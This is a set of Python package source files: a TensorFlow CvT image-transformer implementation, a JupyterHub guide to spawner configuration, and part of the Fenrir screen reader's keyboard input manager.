name="convolution_projection_value",
)
self.projection_query = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_query",
)
self.projection_key = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_key",
)
self.projection_value = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_value",
)
self.dropout = tf.keras.layers.Dropout(attention_drop_rate)
def rearrange_for_multi_head_attention(self, hidden_state: tf.Tensor) -> tf.Tensor:
batch_size, hidden_size, _ = shape_list(hidden_state)
head_dim = self.embed_dim // self.num_heads
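        # "batch_size, hidden_size, (num_heads*head_dim) -> batch_size, num_heads, hidden_size, head_dim"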
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, self.num_heads, head_dim)
)
hidden_state = tf.transpose(hidden_state, perm=(0, 2, 1, 3))
return hidden_state
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
) -> tf.Tensor:
if self.with_cls_token:
cls_token, hidden_state = tf.split(hidden_state, [1, height * width], 1)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
batch_size, hidden_size, num_channels = shape_list(hidden_state)
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, height, width, num_channels)
)
key = self.convolution_projection_key(hidden_state, training=training)
query = self.convolution_projection_query(hidden_state, training=training)
value = self.convolution_projection_value(hidden_state, training=training)
if self.with_cls_token:
query = tf.concat((cls_token, query), axis=1)
key = tf.concat((cls_token, key), axis=1)
value = tf.concat((cls_token, value), axis=1)
head_dim = self.embed_dim // self.num_heads
query = self.rearrange_for_multi_head_attention(self.projection_query(query))
key = self.rearrange_for_multi_head_attention(self.projection_key(key))
value = self.rearrange_for_multi_head_attention(self.projection_value(value))
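        # Scaled dot-product attention over the convolution-projected query/key/value tokens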
attention_score = tf.matmul(query, key, transpose_b=True) * self.scale
attention_probs = stable_softmax(logits=attention_score, axis=-1)
attention_probs = self.dropout(attention_probs, training=training)
context = tf.matmul(attention_probs, value)
# "batch_size, num_heads, hidden_size, head_dim -> batch_size, hidden_size, (num_heads*head_dim)"
_, _, hidden_size, _ = shape_list(context)
context = tf.transpose(context, perm=(0, 2, 1, 3))
context = tf.reshape(
context, (batch_size, hidden_size, self.num_heads * head_dim)
)
return context
class TFCvtSelfOutput(tf.keras.layers.Layer):
"""Output of the Attention layer ."""
def __init__(self, config: CvtConfig, embed_dim: int, drop_rate: float, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
name="dense",
)
self.dropout = tf.keras.layers.Dropout(drop_rate)
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.dense(inputs=hidden_state)
hidden_state = self.dropout(inputs=hidden_state, training=training)
return hidden_state
class TFCvtAttention(tf.keras.layers.Layer):
"""Attention layer. First chunk of the convolutional transformer block."""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
drop_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.attention = TFCvtSelfAttention(
config,
num_heads,
embed_dim,
kernel_size,
stride_q,
stride_kv,
padding_q,
padding_kv,
qkv_projection_method,
qkv_bias,
attention_drop_rate,
with_cls_token,
name="attention",
)
self.dense_output = TFCvtSelfOutput(config, embed_dim, drop_rate, name="output")
def prune_heads(self, heads):
raise NotImplementedError
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
):
self_output = self.attention(hidden_state, height, width, training=training)
attention_output = self.dense_output(self_output, training=training)
return attention_output
class TFCvtIntermediate(tf.keras.layers.Layer):
"""Intermediate dense layer. Second chunk of the convolutional transformer block."""
def __init__(self, config: CvtConfig, embed_dim: int, mlp_ratio: int, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=int(embed_dim * mlp_ratio),
kernel_initializer=get_initializer(config.initializer_range),
activation="gelu",
name="dense",
)
def call(self, hidden_state: tf.Tensor) -> tf.Tensor:
hidden_state = self.dense(hidden_state)
return hidden_state
class TFCvtOutput(tf.keras.layers.Layer):
"""
    Output of the Convolutional Transformer Block (last chunk). It consists of an MLP and a residual connection.
"""
def __init__(self, config: CvtConfig, embed_dim: int, drop_rate: int, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
name="dense",
)
self.dropout = tf.keras.layers.Dropout(drop_rate)
def call(
self, hidden_state: tf.Tensor, input_tensor: tf.Tensor, training: bool = False
) -> tf.Tensor:
hidden_state = self.dense(inputs=hidden_state)
hidden_state = self.dropout(inputs=hidden_state, training=training)
hidden_state = hidden_state + input_tensor
return hidden_state
class TFCvtLayer(tf.keras.layers.Layer):
"""
    Convolutional Transformer Block composed of attention layers, normalization and multi-layer perceptrons (MLPs). It
    consists of 3 chunks: an attention layer, an intermediate dense layer and an output layer. This corresponds to the
`Block` class in the original implementation.
"""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
drop_rate: float,
mlp_ratio: float,
drop_path_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.attention = TFCvtAttention(
config,
num_heads,
embed_dim,
kernel_size,
stride_q,
stride_kv,
padding_q,
padding_kv,
qkv_projection_method,
qkv_bias,
attention_drop_rate,
drop_rate,
with_cls_token,
name="attention",
)
self.intermediate = TFCvtIntermediate(
config, embed_dim, mlp_ratio, name="intermediate"
)
self.dense_output = TFCvtOutput(config, embed_dim, drop_rate, name="output")
# Using `layers.Activation` instead of `tf.identity` to better control `training` behaviour.
self.drop_path = (
TFCvtDropPath(drop_path_rate, name="drop_path")
if drop_path_rate > 0.0
else tf.keras.layers.Activation("linear", name="drop_path")
)
# Using the same default epsilon as PyTorch
self.layernorm_before = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm_before"
)
self.layernorm_after = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm_after"
)
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
) -> tf.Tensor:
# in Cvt, layernorm is applied before self-attention
attention_output = self.attention(
self.layernorm_before(hidden_state), height, width, training=training
)
attention_output = self.drop_path(attention_output, training=training)
# first residual connection
hidden_state = attention_output + hidden_state
# in Cvt, layernorm is also applied after self-attention
layer_output = self.layernorm_after(hidden_state)
layer_output = self.intermediate(layer_output)
# second residual connection is done here
layer_output = self.dense_output(layer_output, hidden_state)
layer_output = self.drop_path(layer_output, training=training)
return layer_output
class TFCvtStage(tf.keras.layers.Layer):
"""
    Cvt stage (encoder block). Each stage has 2 parts:
- (1) A Convolutional Token Embedding layer
- (2) A Convolutional Transformer Block (layer).
The classification token is added only in the last stage.
Args:
config ([`CvtConfig`]): Model configuration class.
stage (`int`): Stage number.
"""
def __init__(self, config: CvtConfig, stage: int, **kwargs):
super().__init__(**kwargs)
self.config = config
self.stage = stage
if self.config.cls_token[self.stage]:
self.cls_token = self.add_weight(
shape=(1, 1, self.config.embed_dim[-1]),
initializer=get_initializer(self.config.initializer_range),
trainable=True,
name="cvt.encoder.stages.2.cls_token",
)
self.embedding = TFCvtEmbeddings(
self.config,
patch_size=config.patch_sizes[self.stage],
stride=config.patch_stride[self.stage],
embed_dim=config.embed_dim[self.stage],
padding=config.patch_padding[self.stage],
dropout_rate=config.drop_rate[self.stage],
name="embedding",
)
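        # Stochastic-depth (drop path) rates, linearly spaced across the blocks of this stage.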
drop_path_rates = tf.linspace(
0.0, config.drop_path_rate[self.stage], config.depth[stage]
)
drop_path_rates = [x.numpy().item() for x in drop_path_rates]
self.layers = [
TFCvtLayer(
config,
num_heads=config.num_heads[self.stage],
embed_dim=config.embed_dim[self.stage],
kernel_size=config.kernel_qkv[self.stage],
stride_q=config.stride_q[self.stage],
stride_kv=config.stride_kv[self.stage],
padding_q=config.padding_q[self.stage],
padding_kv=config.padding_kv[self.stage],
qkv_projection_method=config.qkv_projection_method[self.stage],
qkv_bias=config.qkv_bias[self.stage],
attention_drop_rate=config.attention_drop_rate[self.stage],
drop_rate=config.drop_rate[self.stage],
mlp_ratio=config.mlp_ratio[self.stage],
drop_path_rate=drop_path_rates[self.stage],
with_cls_token=config.cls_token[self.stage],
name=f"layers.{j}",
)
for j in range(config.depth[self.stage])
]
def call(self, hidden_state: tf.Tensor, training: bool = False):
cls_token = None
hidden_state = self.embedding(hidden_state, training)
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(hidden_state)
hidden_size = height * width
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, num_channels)
)
if self.config.cls_token[self.stage]:
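            # Broadcast the learned classification token over the batch and prepend it to the patch tokens.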
cls_token = tf.repeat(self.cls_token, repeats=batch_size, axis=0)
hidden_state = tf.concat((cls_token, hidden_state), axis=1)
for layer in self.layers:
layer_outputs = layer(hidden_state, height, width, training=training)
hidden_state = layer_outputs
if self.config.cls_token[self.stage]:
cls_token, hidden_state = tf.split(hidden_state, [1, height * width], 1)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, height, width, num_channels)
)
return hidden_state, cls_token
class TFCvtEncoder(tf.keras.layers.Layer):
"""
Convolutional Vision Transformer encoder. CVT has 3 stages of encoder blocks with their respective number of layers
(depth) being 1, 2 and 10.
Args:
config ([`CvtConfig`]): Model configuration class.
"""
config_class = CvtConfig
def __init__(self, config: CvtConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.stages = [
TFCvtStage(config, stage_idx, name=f"stages.{stage_idx}")
for stage_idx in range(len(config.depth))
]
def call(
self,
pixel_values: TFModelInputType,
output_hidden_states: Optional[bool] = False,
return_dict: Optional[bool] = True,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
all_hidden_states = () if output_hidden_states else None
hidden_state = pixel_values
# When running on CPU, `tf.keras.layers.Conv2D` doesn't support (batch_size, num_channels, height, width)
# as input format. So change the input format to (batch_size, height, width, num_channels).
hidden_state = tf.transpose(hidden_state, perm=(0, 2, 3, 1))
cls_token = None
for _, (stage_module) in enumerate(self.stages):
hidden_state, cls_token = stage_module(hidden_state, training=training)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
# Change back to (batch_size, num_channels, height, width) format to have uniformity in the modules
hidden_state = tf.transpose(hidden_state, perm=(0, 3, 1, 2))
if output_hidden_states:
all_hidden_states = tuple(
[tf.transpose(hs, perm=(0, 3, 1, 2)) for hs in all_hidden_states]
)
if not return_dict:
return tuple(
v for v in [hidden_state, cls_token, all_hidden_states] if v is not None
)
return TFBaseModelOutputWithCLSToken(
last_hidden_state=hidden_state,
cls_token_value=cls_token,
hidden_states=all_hidden_states,
)
@keras_serializable
class TFCvtMainLayer(tf.keras.layers.Layer):
"""Construct the Cvt model."""
config_class = CvtConfig
def __init__(self, config: CvtConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.encoder = TFCvtEncoder(config, name="encoder")
@unpack_inputs
def call(
self,
pixel_values: Optional[TFModelInputType] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
encoder_outputs = self.encoder(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = encoder_outputs[0]
if not return_dict:
return (sequence_output,) + encoder_outputs[1:]
return TFBaseModelOutputWithCLSToken(
last_hidden_state=sequence_output,
cls_token_value=encoder_outputs.cls_token_value,
hidden_states=encoder_outputs.hidden_states,
)
class TFCvtPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = CvtConfig
base_model_prefix = "cvt"
main_input_name = "pixel_values"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
"""
Dummy inputs to build the network.
Returns:
`Dict[str, tf.Tensor]`: The dummy inputs.
"""
VISION_DUMMY_INPUTS = tf.random.uniform(
shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32
)
return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
@tf.function(
input_signature=[
{
"pixel_values": tf.TensorSpec(
(None, None, None, None), tf.float32, name="pixel_values"
),
}
]
)
def serving(self, inputs):
"""
Method used for serving the model.
Args:
inputs (`Dict[str, tf.Tensor]`):
The input of the saved model as a dictionary of tensors.
"""
output = self.call(inputs)
return self.serving_output(output)
TFCVT_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TF 2.0 models accepts two formats as inputs:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional arguments.
This second option is useful when using [`tf.keras.Model.fit`] method which currently requires having all the
tensors in the first argument of the model call function: `model(inputs)`.
</Tip>
Args:
config ([`CvtConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
TFCVT_INPUTS_DOCSTRING = r"""
Args:
        pixel_values (`np.ndarray`, `tf.Tensor`, `List[tf.Tensor]`, `Dict[str, tf.Tensor]` or `Dict[str, np.ndarray]`, and each example must have the shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoFeatureExtractor`]. See
[`AutoFeatureExtractor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
        training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@add_start_docstrings(
"The bare Cvt Model transformer outputting raw hidden-states without any specific head on top.",
TFCVT_START_DOCSTRING,
)
class TFCvtModel(TFCvtPreTrainedModel):
def __init__(self, config: CvtConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.cvt = TFCvtMainLayer(config, name="cvt")
@unpack_inputs
@add_start_docstrings_to_model_forward(TFCVT_INPUTS_DOCSTRING)
@replace_return_docstrings(
output_type=TFBaseModelOutputWithCLSToken, config_class=_CONFIG_FOR_DOC
)
def call(
self,
pixel_values: Optional[tf.Tensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoFeatureExtractor, TFCvtModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = AutoFeatureExtractor.from_pretrained("microsoft/cvt-13")
>>> model = TFCvtModel.from_pretrained("microsoft/cvt-13")
>>> inputs = feature_extractor(images=image, return_tensors="tf")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
outputs = self.cvt(
pixel_values=pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
if not return_dict:
return (outputs[0],) + outputs[1:]
return TFBaseModelOutputWithCLSToken(
last_hidden_state=outputs.last_hidden_state,
cls_token_value=outputs.cls_token_value,
hidden_states=outputs.hidden_states,
)
def serving_output(
self, output: TFBaseModelOutputWithCLSToken
) -> TFBaseModelOutputWithCLSToken:
return TFBaseModelOutputWithCLSToken(
last_hidden_state=output.last_hidden_state,
cls_token_value=output.cls_token_value,
hidden_states=output.hidden_states,
)
@add_start_docstrings(
"""
Cvt Model transformer with an image classification head on top (a linear layer on top of the final hidden state of
the [CLS] token) e.g. for ImageNet.
""",
TFCVT_START_DOCSTRING,
)
class TFCvtForImageClassification(TFCvtPreTrainedModel, TFSequenceClassificationLoss):
def __init__(self, config: CvtConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.cvt = TFCvtMainLayer(config, name="cvt")
# Using same default epsilon as in the original implementation.
self.layernorm = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm"
)
# Classifier head
self.classifier = tf.keras.layers.Dense(
units=config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=True,
bias_initializer="zeros",
name="classifier",
)
@unpack_inputs
@add_start_docstrings_to_model_forward(TFCVT_INPUTS_DOCSTRING)
@replace_return_docstrings(
output_type=TFImageClassifierOutputWithNoAttention, config_class=_CONFIG_FOR_DOC
)
def call(
self,
pixel_values: Optional[tf.Tensor] = None,
labels: Optional[tf.Tensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFImageClassifierOutputWithNoAttention, Tuple[tf.Tensor]]:
r"""
labels (`tf.Tensor` or `np.ndarray` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
Returns:
Examples:
```python
>>> from transformers import AutoFeatureExtractor, TFCvtForImageClassification
>>> import tensorflow as tf
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = AutoFeatureExtractor.from_pretrained("microsoft/cvt-13")
>>> model = TFCvtForImageClassification.from_pretrained("microsoft/cvt-13")
>>> inputs = feature_extractor(images=image, return_tensors="tf")
>>> outputs = model(**inputs)
>>> logits = outputs.logits
>>> # model predicts one of the 1000 ImageNet classes
>>> predicted_class_idx = tf.math.argmax(logits, axis=-1)[0]
>>> print("Predicted class:", model.config.id2label[int(predicted_class_idx)])
```"""
outputs = self.cvt(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = outputs[0]
cls_token = outputs[1]
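        # Classify from the [CLS] token when the last stage produces one; otherwise mean-pool the flattened spatial tokens.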
if self.config.cls_token[-1]:
sequence_output = self.layernorm(cls_token)
else:
# rearrange "batch_size, num_channels, height, width -> batch_size, (height*width), num_channels"
batch_size, num_channels, height, width = shape_list(sequence_output)
sequence_output = tf.reshape(
sequence_output, shape=(batch_size, num_channels, height * width)
)
sequence_output = tf.transpose(sequence_output, perm=(0, 2, 1))
sequence_output = self.layernorm(sequence_output)
sequence_output_mean = tf.reduce_mean(sequence_output, axis=1)
logits = self.classifier(sequence_output_mean)
loss = (
None
if labels is None
else self.hf_compute_loss(labels=labels, logits=logits)
)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFImageClassifierOutputWithNoAttention(
loss=loss, logits=logits, hidden_states=outputs.hidden_states
)
def serving_output(
self, output: TFImageClassifierOutputWithNoAttention
) -> TFImageClassifierOutputWithNoAttention:
return TFImageClassifierOutputWithNoAttention(
logits=output.logits, hidden_states=output.hidden_states
) | PypiClean |
/jupyterhub-sdp-0.9.0.1.tar.gz/jupyterhub-sdp-0.9.0.1/docs/source/getting-started/spawners-basics.md | # Spawners and single-user notebook servers
Since the single-user server is an instance of `jupyter notebook`, an entire separate
multi-process application, there are many aspects of that server you can configure, and a lot of ways
to express that configuration.
At the JupyterHub level, you can set some values on the Spawner. The simplest of these is
`Spawner.notebook_dir`, which lets you set the root directory for a user's server. This root
notebook directory is the highest level directory users will be able to access in the notebook
dashboard. In this example, the root notebook directory is set to `~/notebooks`, where `~` is
expanded to the user's home directory.
```python
c.Spawner.notebook_dir = '~/notebooks'
```
You can also specify extra command-line arguments to the notebook server with:
```python
c.Spawner.args = ['--debug', '--profile=PHYS131']
```
This could be used to set the user's default page for the single-user server:
```python
c.Spawner.args = ['--NotebookApp.default_url=/notebooks/Welcome.ipynb']
```
Since the single-user server extends the notebook server application,
it still loads configuration from the `jupyter_notebook_config.py` config file.
Each user may have one of these files in `$HOME/.jupyter/`.
Jupyter also supports loading system-wide config files from `/etc/jupyter/`,
which is the place to put configuration that you want to affect all of your users.
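For example, the same default page could be applied to every user from a system-wide file (a sketch, assuming the standard `jupyter_notebook_config.py` filename under `/etc/jupyter/`):
```python
# /etc/jupyter/jupyter_notebook_config.py
# Applies to every user's single-user server on this machine.
c.NotebookApp.default_url = '/notebooks/Welcome.ipynb'
```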
| PypiClean |
/fenrir-screenreader-1.9.6.post1.tar.gz/fenrir-screenreader-1.9.6.post1/src/fenrirscreenreader/core/inputManager.py |
# Fenrir TTY screen reader
# By Chrys, Storm Dragon, and contributors.
from fenrirscreenreader.core import debug
from fenrirscreenreader.core import inputData
import os, inspect, time
currentdir = os.path.dirname(os.path.realpath(os.path.abspath(inspect.getfile(inspect.currentframe()))))
fenrirPath = os.path.dirname(currentdir)
class inputManager():
def __init__(self):
self.shortcutType = 'KEY'
self.executeDeviceGrab = False
def setShortcutType(self, shortcutType = 'KEY'):
if shortcutType in ['KEY', 'BYTE']:
self.shortcutType = shortcutType
def getShortcutType(self):
return self.shortcutType
def initialize(self, environment):
self.env = environment
self.env['runtime']['settingsManager'].loadDriver(\
self.env['runtime']['settingsManager'].getSetting('keyboard', 'driver'), 'inputDriver')
self.updateInputDevices()
# init LEDs with current state
self.env['input']['newNumLock'] = self.env['runtime']['inputDriver'].getLedState()
self.env['input']['oldNumLock'] = self.env['input']['newNumLock']
self.env['input']['newCapsLock'] = self.env['runtime']['inputDriver'].getLedState(1)
self.env['input']['oldCapsLock'] = self.env['input']['newCapsLock']
self.env['input']['newScrollLock'] = self.env['runtime']['inputDriver'].getLedState(2)
self.env['input']['oldScrollLock'] = self.env['input']['newScrollLock']
self.lastDeepestInput = []
self.env['input']['shortcutRepeat'] = 1
self.lastInputTime = time.time()
def shutdown(self):
self.removeAllDevices()
self.env['runtime']['settingsManager'].shutdownDriver('inputDriver')
def getInputEvent(self):
event = None
try:
event = self.env['runtime']['inputDriver'].getInputEvent()
except:
pass
return event
def setExecuteDeviceGrab(self, newExecuteDeviceGrab = True):
self.executeDeviceGrab = newExecuteDeviceGrab
def handleDeviceGrab(self):
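        # Apply a pending grab request only once the event buffer is drained, no key is held, and grabbing is enabled in settings.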
if not self.executeDeviceGrab:
return
if self.env['input']['eventBuffer'] != []:
return
if not self.noKeyPressed():
return
if not self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
return
if self.env['runtime']['screenManager'].getCurrScreenIgnored():
self.ungrabAllDevices()
else:
self.grabAllDevices()
self.executeDeviceGrab = False
def sendKeys(self, keyMacro):
for e in keyMacro:
key = ''
value = 0
if len(e) != 2:
continue
if isinstance(e[0], int) and isinstance(e[1], str):
key = e[1].upper()
value = e[0]
elif isinstance(e[1], int) and isinstance(e[0], str):
key = e[0].upper()
value = e[1]
else:
continue
if key.upper() == 'SLEEP':
time.sleep(value)
else:
self.env['runtime']['inputDriver'].sendKey(key, value)
def handleInputEvent(self, eventData):
#print(eventData)
if not eventData:
return
        # if a hang appears (stale pressed keys with an empty event buffer), reset the input state
if self.env['input']['eventBuffer'] == []:
if self.env['input']['currInput'] != []:
self.env['input']['currInput'] = []
self.env['input']['shortcutRepeat'] = 1
self.env['input']['prevInput'] = self.env['input']['currInput'].copy()
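        # EventState: 0 = key release, 1 = key press, 2 = key hold (auto-repeat)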
if eventData['EventState'] == 0:
if eventData['EventName'] in self.env['input']['currInput']:
self.env['input']['currInput'].remove(eventData['EventName'])
if len(self.env['input']['currInput']) > 1:
self.env['input']['currInput'] = sorted(self.env['input']['currInput'])
elif len(self.env['input']['currInput']) == 0:
self.env['input']['shortcutRepeat'] = 1
self.lastInputTime = time.time()
elif eventData['EventState'] == 1:
if not eventData['EventName'] in self.env['input']['currInput']:
self.env['input']['currInput'].append(eventData['EventName'])
if len(self.env['input']['currInput']) > 1:
self.env['input']['currInput'] = sorted(self.env['input']['currInput'])
if len(self.lastDeepestInput) < len(self.env['input']['currInput']):
self.setLastDeepestInput( self.env['input']['currInput'].copy())
elif self.lastDeepestInput == self.env['input']['currInput']:
if time.time() - self.lastInputTime <= self.env['runtime']['settingsManager'].getSettingAsFloat('keyboard','doubleTapTimeout'):
self.env['input']['shortcutRepeat'] += 1
else:
self.env['input']['shortcutRepeat'] = 1
self.handleLedStates(eventData)
self.lastInputTime = time.time()
elif eventData['EventState'] == 2:
self.lastInputTime = time.time()
self.env['input']['oldNumLock'] = self.env['input']['newNumLock']
self.env['input']['newNumLock'] = self.env['runtime']['inputDriver'].getLedState()
self.env['input']['oldCapsLock'] = self.env['input']['newCapsLock']
self.env['input']['newCapsLock'] = self.env['runtime']['inputDriver'].getLedState(1)
self.env['input']['oldScrollLock'] = self.env['input']['newScrollLock']
self.env['input']['newScrollLock'] = self.env['runtime']['inputDriver'].getLedState(2)
self.env['runtime']['debug'].writeDebugOut("currInput " + str(self.env['input']['currInput'] ) ,debug.debugLevel.INFO)
if self.noKeyPressed():
self.env['input']['prevInput'] = []
self.handleDeviceGrab()
def handleLedStates(self, mEvent):
try:
if mEvent['EventName'] == 'KEY_NUMLOCK':
self.env['runtime']['inputDriver'].toggleLedState()
elif mEvent['EventName'] == 'KEY_CAPSLOCK':
self.env['runtime']['inputDriver'].toggleLedState(1)
elif mEvent['EventName'] == 'KEY_SCROLLLOCK':
self.env['runtime']['inputDriver'].toggleLedState(2)
except:
pass
def grabAllDevices(self):
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
try:
self.env['runtime']['inputDriver'].grabAllDevices()
except Exception as e:
pass
def ungrabAllDevices(self):
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
try:
self.env['runtime']['inputDriver'].ungrabAllDevices()
except Exception as e:
pass
def handlePlugInputDevice(self, eventData):
self.env['runtime']['inputManager'].updateInputDevices(eventData)
def updateInputDevices(self, newDevice = None):
try:
self.env['runtime']['inputDriver'].updateInputDevices(newDevice)
except:
pass
self.setExecuteDeviceGrab()
try:
if self.env['runtime']['screenManager']:
self.handleDeviceGrab()
except:
pass
def removeAllDevices(self):
try:
self.env['runtime']['inputDriver'].removeAllDevices()
except:
pass
def convertEventName(self, eventName):
if not eventName:
return ''
if eventName == '':
return ''
eventName = eventName.upper()
if eventName == 'KEY_LEFTCTRL':
eventName = 'KEY_CTRL'
elif eventName == 'KEY_RIGHTCTRL':
eventName = 'KEY_CTRL'
elif eventName == 'KEY_LEFTSHIFT':
eventName = 'KEY_SHIFT'
elif eventName == 'KEY_RIGHTSHIFT':
eventName = 'KEY_SHIFT'
elif eventName == 'KEY_LEFTALT':
eventName = 'KEY_ALT'
elif eventName == 'KEY_RIGHTALT':
eventName = 'KEY_ALT'
elif eventName == 'KEY_LEFTMETA':
eventName = 'KEY_META'
elif eventName == 'KEY_RIGHTMETA':
eventName = 'KEY_META'
if self.isFenrirKey(eventName):
eventName = 'KEY_FENRIR'
if self.isScriptKey(eventName):
eventName = 'KEY_SCRIPT'
return eventName
def clearEventBuffer(self):
try:
self.env['runtime']['inputDriver'].clearEventBuffer()
except Exception as e:
pass
def setLastDeepestInput(self, currentDeepestInput):
self.lastDeepestInput = currentDeepestInput
def clearLastDeepInput(self):
self.lastDeepestInput = []
def getLastInputTime(self):
return self.lastInputTime
def getLastDeepestInput(self):
return self.lastDeepestInput
def writeEventBuffer(self):
try:
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
self.env['runtime']['inputDriver'].writeEventBuffer()
self.clearEventBuffer()
except Exception as e:
self.env['runtime']['debug'].writeDebugOut("Error while writeUInput",debug.debugLevel.ERROR)
self.env['runtime']['debug'].writeDebugOut(str(e),debug.debugLevel.ERROR)
def noKeyPressed(self):
return self.env['input']['currInput'] == []
def isKeyPress(self):
return (self.env['input']['prevInput'] == []) and (self.env['input']['currInput'] != [])
def getPrevDeepestShortcut(self):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.getLastDeepestInput())
return str(shortcut)
def getPrevShortcut(self):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.env['input']['prevInput'])
return str(shortcut)
def getCurrShortcut(self, inputSequence = None):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
if inputSequence:
shortcut.append(inputSequence)
else:
shortcut.append(self.env['input']['currInput'])
if len(self.env['input']['prevInput']) < len(self.env['input']['currInput']):
if self.env['input']['shortcutRepeat'] > 1 and not self.shortcutExists(str(shortcut)):
shortcut = []
self.env['input']['shortcutRepeat'] = 1
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.env['input']['currInput'])
